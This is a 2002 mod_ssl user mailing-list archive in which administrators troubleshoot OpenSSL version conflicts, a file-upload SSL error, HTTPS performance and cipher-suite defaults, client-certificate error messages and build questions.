Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066E24@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: Problem with File-Upload>20k Date: Sat, 2 Mar 2002 14:07:19 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users One thing to double-check is whether you are compiling with the correct headers. What does rpm -q openssl-devel give you? You should be able to remove the openssl-devel package if it's installed with the usual rpm -e openssl-devel It is possible that you are compiling against the older headers, whilst the libraries used are the newer version of openssl that you've compiled. I'll be trying this kind of installation out myself soon for Red Hat 7.2, as the lag in versions that Red Hat provide is becoming irritating. If you are still stuck I'll speed myself up a bit! - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Evolution - A crutch for scientists who can't handle the existence of the creator. See "disproven scientific theories" and Romans 1:22. >-----Original Message----- >From: Michael Metz [mailto:mail@michael-metz.de] >Sent: 01 March 2002 17:19 >To: modssl-users@modssl.org >Subject: RE: Problem with File-Upload>20k > > >Hi John, > >I have reinstalled openssl 0.9.6 (Sep 2000) which was shipped >with RedHat >7.1 but with no effect. I'm receiving the same error. >apache and/or mod_ssl isn't installed via RPM (checked) > >I compiled apache/mod_ssl with the following arguments: >(I'm using constants for Version-Numbers ....) > >cd mod_ssl-$MODSSLVERSION >./configure --with-apache=../apache_$APACHEVERSION >cd ../apache_$APACHEVERSION >CFLAGS="-Wall -DSECURITY_HOLE_PASS_AUTHORIZATION" >SSL_BASE="/usr/local/ssl/" >export CFLAGS SSL_BASE >./configure --with-layout=RedHat --enable-module=vhost_alias --enable- >module=so --enable-module=rewrite --enable-module=log_referer --enable- >module=ssl --enable-module=info --add-module=../mod_gzip.c --server- >uid=wwwrun --server-gid=www > >Could there be the problem? > >Thanks in advance ... > >Bye > Michael > >Am 1 Mar 2002 14:44 schrieb John.Airey@rnib.org.uk: >> This kind of error is often seen where there is a conflict >between the >> built-in version of openssl and the version you have compiled. >> >> Redhat 7.0,7.1 and 7.2 all come with openssl. Currently they are all >> older versions than what you can compile from source, and so are the >> version of apache and mod_ssl that they supply. >> >> Can you check what you get if you type >> >> rpm -q apache >> rpm -q mod_ssl >> >> These are the built-in packages, which may also conflict >with what you >> have compiled. Unlike openssl, you will be able to remove these >> packages, although you may have to remove other packages also. In the >> case of openssl, ensure you don't overwrite the built-in one in >> /usr/bin. Use /usr/local/bin instead. If you have, use >> >> rpm -ivh "openssl-package-name" --force >> >> To forcibly reinstall the built-in package. >> >> Incidentally, I'm currently writing a submission for the openssl FAQ >> because this comes up so often. >> >> - >> John Airey >> Internet systems support officer, ITCSD, Royal National Institute for >> the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 >> 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk >> >> Evolution - A crutch for scientists who can't handle the existence of >> the creator. See "disproven scientific theories" and Romans 1:22. >> >> >> >-----Original Message----- >> >From: Michael Metz [mailto:mail@michael-metz.de] >> >Sent: 01 March 2002 13:21 >> >To: modssl-users@modssl.org >> >Subject: Problem with File-Upload>20k >> > >> > >> >Hi there, >> > >> >i'm running a SSL enabled WebServer since nearly 1 month. Today I >> >wanted to make an http-file-upload (~20k) an received the following >> >error in my error_log: [Fri Mar 1 11:26:41 2002] [error] mod_ssl: >> >SSL error on reading data (OpenSSL library error follows) >[Fri Mar 1 >> >11:26:41 2002] [error] OpenSSL: error:1408F10B:SSL >> >routines:SSL3_GET_RECORD:wrong version number >> > >> >After that I updated my openssl-Version (which was from Dec 2000) to >> >the current release "OpenSSL 0.9.6c [engine] 21 dec 2001" and >> >recompiled my apache 1.3.23 mit mod_ssl 2.8.7-1.3.23. With no other >> >result. Normal connections seem to work fine (Opera says "High >> >Encryption TLS v1.0 128 bit C4 (1024 bit RSA/SHA) but File-Uploads >> >fail when they are larger than about 20k. Smaller files work fine >> >.... I'm running on RedHat 7.1 >> > >> >Can anyone give me a solution for this problem? >> > >> >MfG >> > Michael >> > >> >>_____________________________________________________________________ >> >_ Apache Interface to OpenSSL (mod_ssl) >> >www.modssl.org User Support Mailing List >> >modssl-users@modssl.org Automated List Manager > >> > majordomo@modssl.org >> > >> >> - >> >> NOTICE: The information contained in this email and any >attachments is >> confidential and may be legally privileged. If you are not the >> intended recipient you are hereby notified that you must not use, >> disclose, distribute, copy, print or rely on this email's content. If >> you are not the intended recipient, please notify the sender >> immediately and then delete the email and any attachments from your >> system. >> >> RNIB has made strenuous efforts to ensure that emails and any >> attachments generated by its staff are free from viruses. However, it >> cannot accept any responsibility for any viruses which are >> transmitted. We therefore recommend you scan all attachments. >> >> Please note that the statements and views expressed in this email and >> any attachments are those of the author and do not necessarily >> represent those of RNIB. >> >> RNIB Registered Charity Number: 226227 >> >> Website: http://www.rnib.org.uk >> >> 14th June 2002 is RNIB Look Loud Day - visit >> http://www.lookloud.org.uk to find out all about it. >> >> >______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) >www.modssl.org >> User Support Mailing List > modssl-users@modssl.org >> Automated List Manager >majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 19:25:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02271; Sat, 2 Mar 2002 19:24:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from palrel13.hp.com id TAA02240; Sat, 2 Mar 2002 19:23:05 +0100 (MET) Received: from xparelay1.corp.hp.com (xparelay1.corp.hp.com [15.58.136.173]) by palrel13.hp.com (Postfix) with ESMTP id 6397B400898 for ; Sat, 2 Mar 2002 10:22:58 -0800 (PST) Received: from xpabh1.corp.hp.com (xpabh1.corp.hp.com [15.58.136.191]) by xparelay1.corp.hp.com (Postfix) with ESMTP id D962EE000A5 for ; Sat, 2 Mar 2002 10:22:57 -0800 (PST) Received: by xpabh1.corp.hp.com with Internet Mail Service (5.5.2653.19) id <17ZCAG3A>; Sat, 2 Mar 2002 10:22:57 -0800 Message-ID: From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" To: "'modssl-users@modssl.org'" Subject: RE: Apache-modSSL performance problems Date: Sat, 2 Mar 2002 10:22:57 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users just iterating on point (a) mentioned by Geoff, if you force the negotiation using RC4 (which I believe is forced by iPlanet), you should see a substantial increase in the no. of connections handled.. The other parameters (logging etc) does help, but not as much as (a).. BTW, as a seperate question, why is RC4 not made the default crypto to be used in mod_ssl ?. -Madhu -----Original Message----- From: Geoff Thorpe [mailto:geoff@geoffthorpe.net] Sent: Friday, March 01, 2002 9:31 PM To: modssl-users@modssl.org Subject: Re: Apache-modSSL performance problems Hi there, I can recommend trying "swamp" for testing your servers, but that is (of course) a take-it-or-leave-it tip, no strings attached. http://www.geoffthorpe.net/crypto/swamp/ However, the README/FAQ files in that contain quite a bit of information on this subject that will help you if you read them. But let me throw you the relevant words, and allow you to work through them (and the information files) at your leisure; (a) cipher suites (esp. "EDH") (b) session caching (what resume behaviour are you getting on iplanet versus modssl?) (c) configuration (default config with modssl is not heavily optimised, eg. SSLLogLevel, "mime magic", "CompatEnvVars", etc may slow things down). Cheers, Geoff On Saturday 02 March 2002 12:31, Latif, Magid wrote: > Greetings all, > > I noticed a posting to the modssl-users list concerning performance > figures of Apache-modSSL. I was wondering if you've came across any > information in that regard. I am getting quite bad performance with > apache-modSSL on a SPARC Solaris 8 platform. > Iplanet is achieving 98 hits/second with versus 6.8 hits/second with > apache-modssl on average. > I am using a very simple test scenario using LoadRunner 7.02. See tests > details below : > > Background: > ----------- > During performance tests I discovered a severe performance problem with > Apache-modssl. The versions subjected to the tests were : > > Test Versions: > ------------- > apache-1.3.19-modSSL-2.8.3 without MM file-based SSL session caching. > apache-1.3.19-modSSL-2.8.3 with MM and shared memory based SSL session > caching. > apache-1.3.23-modSSL-2.8.6 with MM and shared memory based SSL session > caching. > iplanet 6.0sp1-128bit - default (out of the box) configuration > > Test Platform: > -------------- > Webserver : SPARC Solaris 8 10/01 with latest patches installed > Load generator: Pentium III 512MB, win2k, LoadRunner 7.02 - Emulating IE > 5.5 > > Test Scenario: > -------------- > I created a simple load test scenario using LoadRunner. (version 7.02 on > a 512MB PIII w/win2k) The scenario consists of accessing three static > HTML pages. Those pages contain no images. Running the scenario with 3 > concurrent users (loadrunner virtual users) resulted in the following : > > Test Results: > ------------- > + apache-1.3.19-modSSL-2.8.3-openSSL-0.9.6a without MM - Concurrent > Users: 03 > Running time : 11 minutes > Hits/Second : 4.72 (average) > Webserver load : 3.2 (average) > > + apache-1.3.19-modSSL-2.8.3-openSSL-0.9.6a with MM - Concurrent Users: > 03 Running time: 11 minutes > Hits/Second : 6.57 (average) > Webserver load : 3.2 (average) > > + apache-1.3.23-modSSL-2.8.6-openSSL-0.9.6c with MM - Concurrent Users: > 03 Running time: 11 minutes > Hits/Second : 6.79 (average) > > + iplanet 6.0sp1-128bit - Concurrent Users: 03 > Running time: 11 minutes > Hits/Second : 98.2 (average) > Webserver load : 4.2 (average) > > > I turned off modSSL within the same apache configuration and increased > the number of concurrent users in LoadRunner to 90. This resulted in a > bit more than 170 hits/second. Therefore, I concluded that modSSL is > having some severe performance problems. > > Perhaps I am missing some tuning parameters specific for modSSL ? > > Any input very welcome. > > Cheers, > > Magid. > > ================================= > Magid Latif > Systems Engineer > iPIN > 19 Davis Drive > Belmont, CA 94002 > Direct: +1 (650) 232 3704 > Main: +1 (650) 232 3700 x3704 > Fax: +1 (650) 232 5116 > http://www.iPIN.com > > > ===================================================================== > Warning: All e-mail messages sent to or from this address are recorded > by the iPIN corporate e-mail system and may be subject to archival and > review. Furthermore, information in this e-mail may contain privileged or > confidential information and is intended only for the recipient. If you > receive this message in error, notify iPIN immediately by replying to > this message and then deleting it from your computer. Any information in > this e-mail doesn't necessarily reflect the views or opinions of iPIN. > ====================================================================. > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 23:29:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA14582; Sat, 2 Mar 2002 23:28:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta5-rme.xtra.co.nz id XAA14290; Sat, 2 Mar 2002 23:27:22 +0100 (MET) Received: from there ([210.86.53.53]) by mta5-rme.xtra.co.nz with SMTP id <20020302222714.OPIV25716.mta5-rme.xtra.co.nz@there>; Sun, 3 Mar 2002 11:27:14 +1300 Content-Type: text/plain; charset="iso-8859-1" From: Geoff Thorpe To: modssl-users@modssl.org Subject: Re: Apache-modSSL performance problems Date: Sun, 3 Mar 2002 11:27:58 +1300 X-Mailer: KMail [version 1.3.1] References: In-Reply-To: MIME-Version: 1.0 Message-Id: <20020302222714.OPIV25716.mta5-rme.xtra.co.nz@there> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAA14474 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Geoff Thorpe X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hey there, On Sunday 03 March 2002 07:22, MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1) wrote: > just iterating on point (a) mentioned by Geoff, if you force the > negotiation using RC4 (which I believe is forced by iPlanet), you should > see a substantial increase in the no. of connections handled.. The other > parameters (logging etc) does help, but not as much as (a).. Yep, quite likely. > BTW, as a seperate question, why is RC4 not made the default crypto to be > used in mod_ssl ?. https (and thus modssl) exist to give strong security to the carriage of http data. If security wasn't an issue, you'd simply use http and have substantially better performance (CPU, network, caching, etc). So, it makes sense for the order of supported SSL/TLS cipher-suites, as exposed by the server anyway, to be based on security considerations rather than speed. I.E./Netscape etc don't support EDH cipher-suites, nor many other oddball ones for that matter, so this isn't a "problem". But, if the browser expresses support for them, it makes sense for the *default* (in lieu of any settings/overrides by the server-admin or browser-user) to be the most secure choice. EDH suites have Perfect Forward Secrecy, which from a security point of view is much better than other (faster) suites without that property. If speed is the issue, then that changes things - but the server shouldn't assume that focus for the user/admin by default - it is a *security* module after all. A benchmarking program for https support should make it clear in docs and/or command-line usage how it deals with cipher-suite selection. It makes a big difference to the type of security being used, and the CPU/bandwidth requirements of the SSL/TLS negotiation at either end (eg. consider the difference between DSA and RSA on the bias of workload between client and server!). Typically people only think about the speed, never give a moment's thought to the security (which is odd given they're installing https support), and don't even pay attention to which cipher suite is being used when *measuring* the speed. Read: a crap SSL/TLS server can fool you into thinking its better than a full-grade security module for apache with all the trimmings, simply because it refuses to support higher-grade security parameters from the outset. Security is not a rubber stamp - nor a padlock icon in the browser window. A server that thinks any cipher-suite is "good enough" *for* the admin rather than letting the admin specify that if it is so, is programmed/designed by anyone *except* the security savvy. Cheers, Geoff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 3 03:04:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA27956; Sun, 3 Mar 2002 03:03:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA27911; Sun, 3 Mar 2002 03:02:14 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 26C374CE637; Sun, 3 Mar 2002 03:02:14 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g22IOhY10525; Sat, 2 Mar 2002 19:24:43 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from david.speedpartner.de id SAA29542; Sat, 2 Mar 2002 18:11:05 +0100 (MET) Received: (qmail 8169 invoked from network); 2 Mar 2002 17:10:54 -0000 Received: from pd9e22665.dip.t-dialin.net (HELO w01) (217.226.38.101) by 195.167.218.66 with SMTP; 2 Mar 2002 17:10:54 -0000 From: "Michael Metz" To: modssl-users@modssl.org Date: Sat, 2 Mar 2002 18:10:29 +0100 MIME-Version: 1.0 Subject: RE: Problem with File-Upload>20k Message-ID: <3C811595.27404.206B1E@localhost> In-reply-to: <9B66BBD37D5DD411B8CE00508B69700F02066E24@pborolocal.rnib.org.uk> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Michael Metz" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi John, still the same error .... I've removed openssl-devel and compiled apache+mod_ssl again but nothing changed .... Am 2 Mar 2002 14:07 schrieb John.Airey@rnib.org.uk: > One thing to double-check is whether you are compiling with the > correct headers. What does > > rpm -q openssl-devel > > give you? You should be able to remove the openssl-devel package if > it's installed with the usual > > rpm -e openssl-devel > > It is possible that you are compiling against the older headers, > whilst the libraries used are the newer version of openssl that you've > compiled. > > I'll be trying this kind of installation out myself soon for Red Hat > 7.2, as the lag in versions that Red Hat provide is becoming > irritating. If you are still stuck I'll speed myself up a bit! > > - > John Airey > Internet systems support officer, ITCSD, Royal National Institute for > the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 > 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk > > Evolution - A crutch for scientists who can't handle the existence of > the creator. See "disproven scientific theories" and Romans 1:22. > > > >-----Original Message----- > >From: Michael Metz [mailto:mail@michael-metz.de] > >Sent: 01 March 2002 17:19 > >To: modssl-users@modssl.org > >Subject: RE: Problem with File-Upload>20k > > > > > >Hi John, > > > >I have reinstalled openssl 0.9.6 (Sep 2000) which was shipped > >with RedHat > >7.1 but with no effect. I'm receiving the same error. > >apache and/or mod_ssl isn't installed via RPM (checked) > > > >I compiled apache/mod_ssl with the following arguments: > >(I'm using constants for Version-Numbers ....) > > > >cd mod_ssl-$MODSSLVERSION > >./configure --with-apache=../apache_$APACHEVERSION > >cd ../apache_$APACHEVERSION > >CFLAGS="-Wall -DSECURITY_HOLE_PASS_AUTHORIZATION" > >SSL_BASE="/usr/local/ssl/" > >export CFLAGS SSL_BASE > >./configure --with-layout=RedHat --enable-module=vhost_alias > >--enable- module=so --enable-module=rewrite > >--enable-module=log_referer --enable- module=ssl --enable-module=info > >--add-module=../mod_gzip.c --server- uid=wwwrun --server-gid=www > > > >Could there be the problem? > > > >Thanks in advance ... > > > >Bye > > Michael > > > >Am 1 Mar 2002 14:44 schrieb John.Airey@rnib.org.uk: > >> This kind of error is often seen where there is a conflict > >between the > >> built-in version of openssl and the version you have compiled. > >> > >> Redhat 7.0,7.1 and 7.2 all come with openssl. Currently they are > >> all older versions than what you can compile from source, and so > >> are the version of apache and mod_ssl that they supply. > >> > >> Can you check what you get if you type > >> > >> rpm -q apache > >> rpm -q mod_ssl > >> > >> These are the built-in packages, which may also conflict > >with what you > >> have compiled. Unlike openssl, you will be able to remove these > >> packages, although you may have to remove other packages also. In > >> the case of openssl, ensure you don't overwrite the built-in one in > >> /usr/bin. Use /usr/local/bin instead. If you have, use > >> > >> rpm -ivh "openssl-package-name" --force > >> > >> To forcibly reinstall the built-in package. > >> > >> Incidentally, I'm currently writing a submission for the openssl > >> FAQ because this comes up so often. > >> > >> - > >> John Airey > >> Internet systems support officer, ITCSD, Royal National Institute > >> for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) > >> 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk > >> > >> Evolution - A crutch for scientists who can't handle the existence > >> of the creator. See "disproven scientific theories" and Romans > >> 1:22. > >> > >> > >> >-----Original Message----- > >> >From: Michael Metz [mailto:mail@michael-metz.de] > >> >Sent: 01 March 2002 13:21 > >> >To: modssl-users@modssl.org > >> >Subject: Problem with File-Upload>20k > >> > > >> > > >> >Hi there, > >> > > >> >i'm running a SSL enabled WebServer since nearly 1 month. Today I > >> >wanted to make an http-file-upload (~20k) an received the > >> >following error in my error_log: [Fri Mar 1 11:26:41 2002] > >> >[error] mod_ssl: SSL error on reading data (OpenSSL library error > >> >follows) > >[Fri Mar 1 > >> >11:26:41 2002] [error] OpenSSL: error:1408F10B:SSL > >> >routines:SSL3_GET_RECORD:wrong version number > >> > > >> >After that I updated my openssl-Version (which was from Dec 2000) > >> >to the current release "OpenSSL 0.9.6c [engine] 21 dec 2001" and > >> >recompiled my apache 1.3.23 mit mod_ssl 2.8.7-1.3.23. With no > >> >other result. Normal connections seem to work fine (Opera says > >> >"High Encryption TLS v1.0 128 bit C4 (1024 bit RSA/SHA) but > >> >File-Uploads fail when they are larger than about 20k. Smaller > >> >files work fine .... I'm running on RedHat 7.1 > >> > > >> >Can anyone give me a solution for this problem? > >> > > >> >MfG > >> > Michael > >> > > >> > >>____________________________________________________________________ > >>_ > >> >_ Apache Interface to OpenSSL (mod_ssl) > >> >www.modssl.org User Support Mailing List > >> >modssl-users@modssl.org Automated List Manager > > > >> > majordomo@modssl.org > >> > > >> > >> - > >> > >> NOTICE: The information contained in this email and any > >attachments is > >> confidential and may be legally privileged. If you are not the > >> intended recipient you are hereby notified that you must not use, > >> disclose, distribute, copy, print or rely on this email's content. > >> If you are not the intended recipient, please notify the sender > >> immediately and then delete the email and any attachments from your > >> system. > >> > >> RNIB has made strenuous efforts to ensure that emails and any > >> attachments generated by its staff are free from viruses. However, > >> it cannot accept any responsibility for any viruses which are > >> transmitted. We therefore recommend you scan all attachments. > >> > >> Please note that the statements and views expressed in this email > >> and any attachments are those of the author and do not necessarily > >> represent those of RNIB. > >> > >> RNIB Registered Charity Number: 226227 > >> > >> Website: http://www.rnib.org.uk > >> > >> 14th June 2002 is RNIB Look Loud Day - visit > >> http://www.lookloud.org.uk to find out all about it. > >> > >> > >_____________________________________________________________________ > >_ > >> Apache Interface to OpenSSL (mod_ssl) > >www.modssl.org > >> User Support Mailing List > > modssl-users@modssl.org > >> Automated List Manager > >majordomo@modssl.org > > > >_____________________________________________________________________ > >_ Apache Interface to OpenSSL (mod_ssl) > >www.modssl.org User Support Mailing List > >modssl-users@modssl.org Automated List Manager > > majordomo@modssl.org > > > > - > > NOTICE: The information contained in this email and any attachments is > confidential and may be legally privileged. If you are not the > intended recipient you are hereby notified that you must not use, > disclose, distribute, copy, print or rely on this email's content. If > you are not the intended recipient, please notify the sender > immediately and then delete the email and any attachments from your > system. > > RNIB has made strenuous efforts to ensure that emails and any > attachments generated by its staff are free from viruses. However, it > cannot accept any responsibility for any viruses which are > transmitted. We therefore recommend you scan all attachments. > > Please note that the statements and views expressed in this email and > any attachments are those of the author and do not necessarily > represent those of RNIB. > > RNIB Registered Charity Number: 226227 > > Website: http://www.rnib.org.uk > > 14th June 2002 is RNIB Look Loud Day - visit > http://www.lookloud.org.uk to find out all about it. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org MfG Michael ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 3 09:54:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA16352; Sun, 3 Mar 2002 09:53:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web13406.mail.yahoo.com id JAA16316; Sun, 3 Mar 2002 09:52:38 +0100 (MET) Message-ID: <20020303085236.53070.qmail@web13406.mail.yahoo.com> Received: from [213.132.36.114] by web13406.mail.yahoo.com via HTTP; Sun, 03 Mar 2002 00:52:36 PST Date: Sun, 3 Mar 2002 00:52:36 -0800 (PST) From: Shiva Murugesan Subject: IE browser does not disply proper error message if the certificate is expired To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiva Murugesan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello there, I have a apache webserver with the following build details. apache 1.3.17 modssl 2.8.0 openssl 0.9.6 I have set SSLVerifyClient require in order to make the browser to present a certificate. If I present a expired certificate in the NE it comes back and says "The server rejected the certificate as expired". Whereas if I do the same in IE 5.5, it comes up with the stupid error "The page cannot be displayed". It also displays when I present the revoked certificate as well. Could anyone help me to show proper error message in IE, that is of great help. Cheers Shiva __________________________________________________ Do You Yahoo!? Yahoo! Sports - sign up for Fantasy Baseball http://sports.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 3 15:02:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA02277; Sun, 3 Mar 2002 15:01:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA02249; Sun, 3 Mar 2002 15:00:35 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id E8D5B4CE618; Sun, 3 Mar 2002 15:00:31 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g23BvWV27509; Sun, 3 Mar 2002 12:57:32 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dns.comrax.com id MAA24529; Sun, 3 Mar 2002 12:25:21 +0100 (MET) Received: from W2KNOOR (mail.comrax.com [194.90.246.126]) by dns.comrax.com (Postfix) with SMTP id 60EE07250B for ; Sun, 3 Mar 2002 13:25:12 +0200 (IST) From: "Noor Dawod" To: Subject: Constant segmentation fault errors when fetching HTTPS pages Date: Sun, 3 Mar 2002 13:25:36 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Noor Dawod" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I'm contacting you because I'm encountering a bug in recent Apache 1.3.23 and relevant mod_ssl version. I've compiled Apache, mod_ssl and PHP 4.1.2 two days ago, and since then the error log is filling with Segmentation faults whenever I try to fetch a page using HTTPS protocol. Same page loads well with no segmentation faults if using the HTTP protocol. It is worth noting that I'm experiencing the same problem when trying to load server-status for the server too. I don't know what's the connection. My server's details is: FreeBSD 4.5-STABLE (2 weeks ago) Apache 1.3.23 mod_ssl-2.8.6-1.3.23 PHP 4.1.2 MySQL 3.23.39 (used for PHP) If you need further information, please let me know. Thanks for the help. Noor ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 4 04:18:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA05902; Mon, 4 Mar 2002 04:17:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from dragon.getnet.net id EAA05883; Mon, 4 Mar 2002 04:16:59 +0100 (MET) Received: (qmail 2297 invoked from network); 4 Mar 2002 03:16:58 -0000 Received: from localhost.getnet.net (HELO servie) (127.0.0.1) by localhost.getnet.net with SMTP; 4 Mar 2002 03:16:58 -0000 From: "Eric" To: Subject: install questions Date: Sun, 3 Mar 2002 20:14:36 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Eric" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I'm following "Apache: the definitive guide," and I'm trying to install apache 1.3.22 with ssl. The book says to i) build SSLeay (openssl), ii) then exand the apache tar ball, iii) then in the parent directory of apache, expand apache+ssl patch iv) then do "./FixPatch". Fixpatch concludes by telling me to rebuild openssl again, but the book clearly implies that this is not to be done. Rather, the book says to go on and re-build apache. Has anyone done this lately? Do I need to rebuild SSL after building 5 minutes ago? I'm using openssl 0.9.5a and apache_1.3.22+ssl_1.44.tar.gz. Eric ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 4 04:35:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA06481; Mon, 4 Mar 2002 04:34:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id EAA06464; Mon, 4 Mar 2002 04:33:22 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g243WXC01298 for ; Sun, 3 Mar 2002 22:32:33 -0500 Date: Sun, 3 Mar 2002 22:32:33 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: install questions In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley 